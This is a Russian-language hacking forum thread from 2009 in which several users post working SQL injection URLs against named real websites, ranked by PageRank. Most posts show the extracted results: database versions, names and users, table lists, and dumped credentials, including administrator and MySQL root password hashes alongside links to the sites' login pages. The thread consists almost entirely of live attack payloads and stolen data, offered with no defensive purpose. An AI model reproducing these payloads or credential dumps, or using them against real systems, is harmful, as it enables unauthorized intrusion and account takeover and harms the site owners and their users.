ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9831  
Старый 11.06.2009, 16:31
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.fibercity.ru/?q=art&id=-44+union+select+1,2,3,concat_ws(0x3a3a,login,pass) +from+users+/*+
superAdmin::cce37934e8857d4fab68c3bfc4946662

http://www.peskostruyka.biz/index.php?ID=-2+union+select+1,2,database(),4,5,6,7,8,9,10,11+/*+
z105024_pesk

http://allina.ru/tovar.php?tovar=65&tovid=-247+UnIoN+SeLecT+1,2,database(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19+/*+
z82987_allina
 
Ответить с цитированием

  #9832  
Старый 11.06.2009, 16:35
Аватар для L I G A
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

[PR]5
www.badtasterecords.se

Код:
http://www.badtasterecords.se/bands.asp?id=-1+union+select+concat_ws(0x203a20,version(),database(),user(),@@version_compile_os)--
version()4.0.27-standard
database()badtaste_d
user()badtaste@w2ks4.fsdata.se
os pc-linux-gnu


______________________

[PR]3
www.podarunok.net
Код:
http://www.podarunok.net/consulting/article/?id=-1+union+select+1,2,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os),4,5,6,7,8--
version()4.1.22-log
database()podarunok
user()podarunok@beta
os portbld-freebsd5.5

______________________
[PR]4
www.frw.ca

Код:
http://www.frw.ca/rouge.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x203a20,version(),database(),user())--
version()4.0.18-Max
database()frw
user()frw@web49

______________________

[PR]2
www.halcyonpix.com

Код:
http://www.halcyonpix.com/view.php?id=-42+union+select+1,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12--
version()4.1.22-MAX-LOG
database()HALCYONPIX1
user()HALCYONPIX1@68.178.254.234
os UNKNOWN-LINUX-GNU


______________________
[PR]1
oldshipbar.ru

Код:
http://oldshipbar.ru/review.php?id=-1+union+select+1,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os),3--

version()5.0.67-LOG
database()U56014_OLDSHIP
user()U56014_OLDSHIP@10.10.153.200
os UNKNOWN-FREEBSD6.1

[tables]

Код:
http://oldshipbar.ru/review.php?id=-1+union+select+1,table_name,3+from+information_schema.tables--
 
Ответить с цитированием

  #9833  
Старый 11.06.2009, 18:09
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 2]
Код:
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.51-2.dotdeb.0-log:funk_hair:sqluser@localhost

data from table 'mysql.user'
Код:
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,user,password,file_priv),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user--
Цитата:
debian-sys-maint:*8032B8C802DD880BA3E2455006707E05D247C94B
sqluser:2b50e1054b3cb08a:Y
data from table 'user'
Код:
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x75736572
http://www.funkhair.com.au/online_shop/stock.php?id=-61+union+select+1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user
id:username:password
Цитата:
2:Administrat0r:ac73732f2ddfaae30a3834e87eadb79efe 39eb2f
307:system:317f1e761f2faa8da781a4762b9dcc2c5cad209 a
308:website:3ab3e0b020a6d41f3d259ddd3ed8ff27384383 9b
http://www.funkhair.com.au/login.php

Последний раз редактировалось RulleR; 11.06.2009 в 18:27..
 
Ответить с цитированием

  #9834  
Старый 11.06.2009, 18:13
Аватар для aciiiD
aciiiD
Новичок
Регистрация: 26.01.2009
Сообщений: 13
Провел на форуме:
86417

Репутация: -17
По умолчанию

_http://cititour.com/NYC_Movies/index.php?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables--
version 5.x.x.x

_http://www.bhnyc.com/category.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13--
version 4.x.x.x

_http://www.arcadevillage.com/agora/displaybest2.php?id=-1+union+select+version(),2--
version 5.x.x.x

_http://www.nycglass.com/index.php?id=-1+union+select+1,2,concat_ws(0x3b,name,pass),4,5,6 ,7+from+users--
хеш трудный(

_http://www.armofthesea.org/repertoire.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13--
4.x.x.x

http://rss.skyride.com/item.php?id=-1+union+select+1,concat_ws(0x3b,user,password),3,4 ,5,6+from+mysql.user--

Последний раз редактировалось jokester; 11.06.2009 в 19:44.. Причина: Посты объединяй
 
Ответить с цитированием

  #9835  
Старый 11.06.2009, 20:54
Аватар для aciiiD
aciiiD
Новичок
Регистрация: 26.01.2009
Сообщений: 13
Провел на форуме:
86417

Репутация: -17
По умолчанию

_http://www.info.pulawy.pl/news.php?id=-3048+union+select+1,concat_ws(0x3b,pass,user()),3, 4,5,6,7,8,9,10,11,12,13+from+users--
 
Ответить с цитированием

  #9836  
Старый 11.06.2009, 22:19
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 3]
Код:
http://www.soulshoes.co.nz/products.php?id=-3+union+select+1,2,concat_ws(0x3a,version(),database(),user())
4.0.26:soulshoes_co_nz:soulshoe@localhost
=====================
[PR 3]
Код:
http://www.wineaway.com.au/app/article_view.php?id=-000006+union+select+1,2,3,convert(concat_ws(0x3a,version(),database(),user())+using+latin1),5,6,7,8,9,10
5.0.18-nt:_production_app:root@localhost

data from table 'mysql.user'
Код:
http://www.wineaway.com.au/app/article_view.php?id=-000006+union+select+1,2,3,convert(concat_ws(0x3a,user,password,file_priv)+using+latin1),5,6,7,8,9,10+from+mysql.user
Цитата:
root:*46CFC7938B60837F46B610A2D10C248874555C14:Y
=====================
[PR 3]
Код:
http://www.sktm.in/product_detailed_search.php?id=-915+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--&searchpage=0&sql1=product_new=0&newarr=n
5.0.22-log:sktm:sktm@localhost

data from table 'mysql.user'
Код:
http://www.sktm.in/product_detailed_search.php?id=-915+union+select+1,2,3,4,concat_ws(0x3a,user,password,file_priv),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+mysql.user--&searchpage=0&sql1=product_new=0&newarr=n
Цитата:
root:2a4f0ece50a065f3:Y
=====================
[PR 2]
Код:
http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15
5.0.51-2.dotdeb.0-log:loddon_heating:sqluser@localhost

data from table 'mysql.user'
Код:
http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,user,password,file_priv),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user
Цитата:
debian-sys-maint:*8032B8C802DD880BA3E2455006707E05D247C94B
sqluser:2b50e1054b3cb08a:Y
data from table 'user'
Код:
http://www.loddonheatingcooling.com.au/catalogue/stock.php?id=-40+union+select+1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user
Цитата:
2:Administrat0r:ac73732f2ddfaae30a3834e87eadb79efe 39eb2f
http://www.loddonheatingcooling.com.au/login.php
=====================
[PR 0]
Код:
http://blossomsflorists.biz/product.php?id=-32+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11
4.1.22-standard:blossom_shop:blossom_gordon@localhost
 
Ответить с цитированием

  #9837  
Старый 11.06.2009, 22:33
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.nordestfm.ro/index.php?page=6&&act=news&cid=3+AND+SUBSTRING((ve rsion()),1,1)=x


Version : 4.1.22-standard-log
User : nordestf_ne@localhost
Database : nordestf_neG
Os : pc-linux-gnu
 
Ответить с цитированием

  #9838  
Старый 11.06.2009, 23:35
Аватар для ..::TROYAN::..
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.komissar.ru/news/?nid=-618+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5--
skuns_main@77.221.130.10:5.0.32-Debian_7etch1-log:skuns_main
TABLES:
Код:
http://www.komissar.ru/news/?nid=-618+union+select+1,2,3,group_concat(table_name,0x3C62723E),5+from+information_schema.tables--
Код:
CHARACTER_SETS
,COLLATIONS
,COLLATION_CHARACTER_SET_APPLICABILITY
,COLUMNS
,COLUMN_PRIVILEGES
,KEY_COLUMN_USAGE
,ROUTINES
,SCHEMATA
,SCHEMA_PRIVILEGES
,STATISTICS
,TABLES
,TABLE_CONSTRAINTS
,TABLE_PRIVILEGES
,TRIGGERS
,USER_PRIVILEGES
,VIEWS
,articles
,articles_view
,banners
,catalog_desc
,catalog_main
,catalog_setup
,catalog_trans
,catalog_value
,company_info
,content
,content_admin
,content_images
,content_main
,customers
,faq
,faq_view
,gallery_folders
,gallery_photos
,gallery_view
,guest_book
,headers
,ip_list
,languages
,news
,news_view
,order_description
,page_banners
,page_banners_logic
,polls_questions
,polls_topics
,titles
PR:3
ТИЦ:100
 
Ответить с цитированием

  #9839  
Старый 11.06.2009, 23:44
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

PR 1
Код:
http://www.aronis.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8--
4.1.22-standard-log


PR 1
Код:
http://japanmoto.com.ua/news.php?id=-1+union+select+1,2,3,4--
5.0.67-log


PR 3
Код:
http://www.gc.ua/en/news.php?id=-568+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

,16,17,18,19,20--
5.0.51a-community


PR 4
Код:
http://www.franchising.org.ua/a-news/news.php?id=-183+union+select+1,2,3,4,5,6,7,8,9,10--
5.0.32-Debian_7etch10-log


PR 3
Код:
http://www.kiosks.com.ua/news.php?id=-183+union+select+1,2,3,4,5,6,7,8--
4.1.22-log


PR 2
Код:
http://bis-land.ru/news.php?id=-183+union+select+1,2,3,4,5,6,7--
5.0.51a-community
 
Ответить с цитированием

  #9840  
Старый 12.06.2009, 00:39
Аватар для aciiiD
aciiiD
Новичок
Регистрация: 26.01.2009
Сообщений: 13
Провел на форуме:
86417

Репутация: -17
По умолчанию

Код:
http://www.dok3.ru/individ.php?id=-1+union+select+1,table_name,3,4+from+information_schema.tables--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ